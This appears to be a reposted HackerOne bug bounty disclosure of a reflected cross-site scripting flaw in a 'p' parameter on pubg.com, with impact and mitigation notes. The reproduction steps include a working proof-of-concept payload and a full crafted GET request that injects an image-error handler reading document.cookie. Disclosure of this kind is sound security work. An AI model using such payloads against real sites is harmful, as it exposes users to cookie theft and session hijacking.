HackerOne Vulnerability Report - Reflected XSS in pubg.com

HackerOne Vulnerability Report - Reflected XSS in pubg.com

2019, Dec 12    

hackerone

HackerOne Report Link

Affected asset(s)

  • https://www.pubg.com/

Description

PUBG’s main website https://www.pubg.com has an endpoint that is vulnerable to an injection vulnerability - namely a reflected injection of JavaScript, also known as Reflected Cross Site Scripting (XSS). As per OWASP’s definition: “Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. “ This happens because one of the GET parameters “p” does not properly sanitize/escape user input, allowing an injection to occur.

Proof of Concept

Video Link

alt text

Steps to reproduce

To reproduce this, an attacker has to:

  • Step 1) Prepare a Javascript payload that it wants the victim to execute. In this case, for Proof of Concept purposes, our Javascript code will prompt an alert showing the users’ cookies.
alert(document.cookie);
  • Step 2) Inject this Javascript code properly into the vulnerable parameter, creating thus a crafted future GET request that will inject the payload.
 GET /?p=iqz78'%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3d1%3echplq HTTP/1.1
Host: www.pubg.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://www.pubg.com/es/feed/
Cookie: _icl_current_language=en; _icl_visitor_lang_js=en-us; wpml_browser_redirect_test=0; __cfduid=de74423d435717d651b1c9e2c63f4acc21575460678

Request PoC

Request

  • Step 3) As this injection happens in a GET parameter, the attacker simply needs to send the crafted Link that produces this GET request to the victim and have the victim click it.

Injection demonstration

Request

Impact

With user interaction, an attacker could execute arbitrary Javascript code in a victim’s browser.

This would allow an attacker to unwillingly make a victim:

  • Perform any action in the identified endpoint
  • View any information that the user is able to view
  • Modify any information that the user is able to modify (not sure if applicable in this case)
  • Interact with other application users as if it were him - impersonation (not sure if applicable in this case)

Mitigation

  • Sanitize inputs if they are reflected into the html rending
  • Configure Content-Security-Policy Header

Reference

Twitter Facebook Google+
# bugbounty # application security